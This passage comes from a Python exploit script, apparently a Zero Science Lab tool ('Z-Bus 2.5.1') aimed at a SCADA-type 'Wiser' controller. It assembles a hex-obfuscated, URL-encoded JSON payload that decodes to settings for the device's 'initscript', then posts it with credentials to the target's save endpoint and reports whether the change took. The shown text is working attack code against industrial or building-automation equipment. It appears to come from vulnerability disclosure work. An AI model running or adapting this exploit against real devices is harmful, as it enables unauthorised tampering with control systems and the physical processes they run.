'\x6D\x70\x2D\x31\x30\x30\x37\x25\x32\x32\x25' self.clank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43' self.slank = '\x25\x32\x32\x65\x78\x74\x2D\x63\x6F\x6D\x70' self.slank += '\x2D\x31\x30\x30\x38\x25\x32\x32\x25\x33\x41' self.slank += '\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25\x32' self.slank += '\x32\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70' self.glank = '\x2D\x73\x65\x61\x72\x63\x68\x25\x32\x32\x25' self.glank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43' self.glank += '\x25\x32\x32\x69\x64\x25\x32\x32\x25\x33\x41' self.glank += '\x25\x32\x32\x69\x6E\x69\x74\x73\x63\x72\x69' self.hlank = '\x70\x74\x25\x32\x32\x25\x32\x43\x25\x32\x32' self.hlank += '\x73\x63\x72\x69\x70\x74\x25\x32\x32\x25\x33' self.hlank += '\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25' self.hlank += '\x32\x32\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C' self.flank = '\x79\x25\x32\x32\x25\x33\x41\x25\x32\x32\x74' self.flank += '\x72\x75\x65\x25\x32\x32\x25\x37\x44'#######' self.clear = f'{self.blank}{self.dlank}{self.clank}{self.slank}{self.glank}{self.hlank}{self.flank}' htreq = requests.post(self.target+self.savs, data=self.clear, headers=self.headers, auth=self.creds) if not 'success' in htreq.text: print('didn\'t work!') exit(18) else: print('done.') exit(-1) def main(self): print('-'*70) print('Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at', self.start) self.memo(), self.mtask() if __name__ == '__main__': Wiser().main()